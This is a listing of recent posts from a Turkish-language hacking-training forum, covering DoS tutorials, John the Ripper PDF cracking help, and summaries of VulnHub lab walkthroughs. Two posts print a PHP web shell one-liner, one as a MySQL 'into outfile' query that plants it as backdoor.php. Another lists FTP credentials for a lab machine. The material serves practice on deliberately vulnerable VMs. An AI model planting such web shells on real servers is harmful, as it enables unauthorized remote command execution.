Son İletiler

Sayfa1 2 3 ... 10
1
DoS-DDoS Saldrı Eğitimleri / Ynt: DOS Atak Saldırısı - WebS...
Son İleti Gönderen HydraX - Ekm 21, 2020, 05:55 ös
Çok güzel olmuş hocam ellerine sağlık
2
Parola Saldırı Eğitimleri / Ynt: PDF Şifre Kırma - JOHN
Son İleti Gönderen mangineer - Ekm 21, 2020, 01:07 ös
Merhabalar

[email protected]:~/Masaüstü# john hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PDF [MD5 SHA2 RC4/AES 32/64])
Cost 1 (revision) is 4 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Crash recovery file is locked: /root/.john/john.rec
[email protected]:~/Masaüstü#


Hocam bu şekilde kalıyor. Ne yapmam gerek?
Bu arada wmvare gile çalıştırıyorum Kalı' yi

3
Sistemlere Sızma Eğitimleri / Ynt: MySQL Servisinden Sunucuy...
Son İleti Gönderen RootAyyıldız - Ekm 14, 2020, 05:15 ös
bazı sunucularda yetkilendirmeler ayarladıgı için anadizine yazıdırlmaya biliyor ne yazık'ki bu konuda hakında detaylı anlatan kimse yok  /var/tmp/ ana dizine yazdırılamazsa /var/tmp/images/ /var/tmp/page/ tarzında farklı klasörler denelenebilir
4
Sistemlere Sızma Eğitimleri / MySQL Servisinden Sunucuya Sız...
Son İleti Gönderen admin - Ekm 14, 2020, 12:41 öö
Arkadaşlar merhaba, bu videoda sizlere, MySQL servisinden sisteme sızma konusundan  bahsedicem. Brute force yoluyla root parolasını öğrendikten sonra, sql sorgusu kullanarak hedefte, yazılabilir bi dizinde  oluşturacağımız backdoor.php dosyasıyla sisteme sızmak mümkün.

Hedef Sanal Sistem : https://www.vulnhub.com/entry/sunset-dusk,404/
MySQL'de Sorgu Yoluyla Dosya(backdoor.php) Oluşturmak İçin :  select "<?php system($_GET['cmd']); ?>" into outfile '/var/tmp/backdoor.php' ;
5
Sistemlere Sızma Eğitimleri / Gizli Dizindeki Güvenlik Açıkl...
Son İleti Gönderen admin - Ekm 12, 2020, 12:24 öö
Arkadaşlar merhaba bu videoda sizlere Gizli Dizindeki Güvenlik Açıkları konusundan bahsedicem.  Hedef web sitesinde otomatik araçlarla güvenlik açığı taraması yapıp herhangi bir sonuç elde edemezsek, 2. olarak yapılması gereken gizli dizin ve sayfaları tespit edip bunlar üzerinde de güvenlik açığı taraması yapmak.

Hedef Sanal Sistem : https://www.vulnhub.com/entry/inclusiveness-1,422/
backdoor.php :  <?php system($_GET['cmd']);?>
6
Sistemlere Sızma Eğitimleri / Blind SQL İnjection
Son İleti Gönderen RootAyyıldız - Ekm 10, 2020, 06:22 ös
Blind SQL İnjection Zafiyeti True False Olarak Çalışmakta Yani Yanlışları Yaparak Doğru Sonuca Adım Adım İlerliyoruz Blind Yani Kör SQL Olarak İsimlendiriliyor Her Hangi Bir SQL Parametresi Uyğuladıgımızda Ekrana Bir Veri Çıktısı Vermez

7
Sistemlere Sızma Eğitimleri / SSH Private Key İle Hedefe Sız...
Son İleti Gönderen admin - Ekm 09, 2020, 11:12 ös
Arkadaşlar merhaba, bu videoda sizlere,   ssh private key elde edilmiş bir sisteme nasıl bağlanabilirsiniz, konusundan bahsedicem. ssh pivate key ssh bağlantısı yapılırken, parola yerine kullanılan bi dosyadır. Normal şartlarda bu dosya gizli ssh dizininde tutulur, ama çeşitli sebeplerle başkalarının ulaşacağı yerlere kopyalanırsa, bu durum kötüye kullanılabilir ve ilgili kullanıcının hesabına bağlanılabilir.

Bu videoda yapacağımız uygulamada  hedef sistemde başkalarıyla paylaşılmak üzere ftp servisinde "share" dizinine kopyalanmış. Hedefe FTP bağlantısı gerçekleştirip ilgili dosyayı kendi bilgisayarımıza indirdikten sonra, hedef kullanıcı adı ve ssh privete key dosyasını kullanarak ssh baglantısı yapacağız. 

Hedef Sanal Makine : https://www.vulnhub.com/entry/pwned-1,507/
FTP Kullanıcı : ftpuser
FTP Parola : B0ss_B!TcH
8
DoS-DDoS Saldrı Eğitimleri / Ynt: DOS Atak Saldırısı - WebS...
Son İleti Gönderen kadirerzincx - Ekm 08, 2020, 01:25 ös
Efso
9
Parola Saldırı Eğitimleri / Dizin Şifrelemesini Kırma
Son İleti Gönderen admin - Ekm 08, 2020, 12:17 öö
Arkadaşlar merhaba, bu videoda sizlere, dizin şifrelemesini kırmaktan bahsedicem. Ek koruma tedbiri olarak kullanılan dizin şifrelemesinde, ilgili dizine gidildiğinde kullanıcı adı ve parola bilgisi istenmektedir. Bu dizin şifrelemesi kaba kuvvet yoluyla kırılabilir. Kaba kuvvet saldırıları genel olarak değerlendirildiğinde, sağlam bir kullanıcı adı ve parola listesine ihtiyac olduğu görülmektedir. Bu noktada hedefe özel kullanıcı adı ve parola listesi oluşturmak başarı şansını artıracaktır.

Uygulamada Kullandığım Sanal Makine  : https://vulnhub.com/entry/powergrid-101,485/
Live Header : https://addons.mozilla.org/tr/firefox/addon/http-header-live/
10
CTF Etkinliği / Ynt: 18.09.2020 - Basic Pentes...
Son İleti Gönderen iyavas09 - Ekm 02, 2020, 03:11 ös
kullanıcı adı ile password bulamadım veya yanlış yerde arıyorum yardımcı olur musnuz
Sayfa1 2 3 ... 10